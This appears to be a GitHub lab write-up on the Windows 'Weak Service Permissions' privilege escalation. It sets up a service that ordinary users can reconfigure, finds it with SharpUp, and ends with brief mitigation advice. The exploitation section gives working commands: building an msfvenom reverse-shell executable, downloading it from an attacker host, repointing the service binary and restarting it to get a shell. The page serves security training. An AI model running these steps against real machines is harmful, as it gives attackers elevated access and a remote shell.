Skip to content

Latest commit

 

History

History
164 lines (103 loc) · 5 KB

WeakServicePermissions.md

File metadata and controls

164 lines (103 loc) · 5 KB
Raw

Weak Service Permissions

Table of Contents

Description

Weak Service Permissions" on Windows indicate insufficient or incorrect permissions within services. Exploiting this vulnerability enables attackers to gain unauthorized access or elevated privileges by manipulating a service's configuration.

Lab Setup

Manual Lab Setup

  1. Open a PowerShell with local Administrtor Privileges and use the following command to create a new folder:
mkdir "C:\Program Files\CustomSrv3\"

  1. Download the file Service3.exe to the 'C:\Program Files\CustomSrv3' directory.

  2. Install the new Service:

New-Service -Name "Vulnerable Service 3" -BinaryPathName "C:\Program Files\CustomSrv3\Service3.exe" -DisplayName "Vuln Service 3" -Description "My Custom Vulnerable Service 3" -StartupType Automatic
  1. Edit new service's permissions to be controlled by BUILTIN\Users:
cmd.exe /c 'sc sdset "Vulnerable Service 3" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;DCRPWP;;;BU)'

Outcome:

Weak-Service-Permissions-Manual-Lab-Setup

  1. Verify the new service (services.msc):

Weak-Service-Permissions-Verify-Service

  1. Manually start the service from the service panel, or reboot the machine due to the service is set to start automatically upon machine boot.

ℹ️ If you want to unistall the new service use the following command:

Remove-Service -Name "Vulnerable Service 3"

PowerShell Script Lab Setup

To set up the lab with the 'Weak Service Binary Permissions' vulnerability is by using the custom PowerShell script named WeakServicePermissions.ps1.

  1. Open a PowerShelll with local Administrator privileges and run the script:
.\WeakServicePermissions.ps1

Outcome:

Weak-Service-Permissions-Script-Lab-Setup

  1. Manually start the service from the service panel, or reboot the machine due to the service is set to start automatically upon machine boot.

ℹ️ If you want to unistall the new service use the following command:

Remove-Service -Name "Vulnerable Service 3"

Enumeration

To run the SharpUp tool and perform an enumeration of the Weak Service Permissions vulnerability, you can execute the following command with appropriate arguments:

SharpUp.exe audit ModifiableServices

Outcome:

Weak-Service-Permissions-Tool-Enumeration

Exploitation

  1. Create with msfvenom a malicious exe file:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=1234 -f exe > nikos.exe

  1. Open a listener in your kali machine.

  2. Create Temp folder:

mkdir C:\TempFolder
  1. Transfer malicious executablr file in Temp folder:
iwr -Uri http://<ip>:<port>/nikos.exe -Outfile C:\TempFolder\nikos.exe
  1. Reconfigure the binary path on the vulnerable service:
sc config "Vulnerable Service 3" binPath= C:\TempFolder\nikos.exe
  1. Verify that the path has indeed been updated:
sc qc "Vulnerable Service 3"

Outcome:

Weak-Service-Permissions-Exploitation-1

  1. Stop the running service:
sc stop "Vulnerable Service 3"
  1. Start the vulnerable service:
sc start "Vulnerable Service 3"

Outcome:

Weak-Service-Permissions-Exploitation-2

  1. Verify the reverse shell on your Kali machine:

Weak-Service-Permissions-Reverse-Shell

Mitigation

To defend against Weak Service Permissions vulnerabilities, adjust permissions on Service initiated through this mechanism. This limits unauthorized access and strengthens security measures:

sc sdset "Vulnerable Service 3" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)

References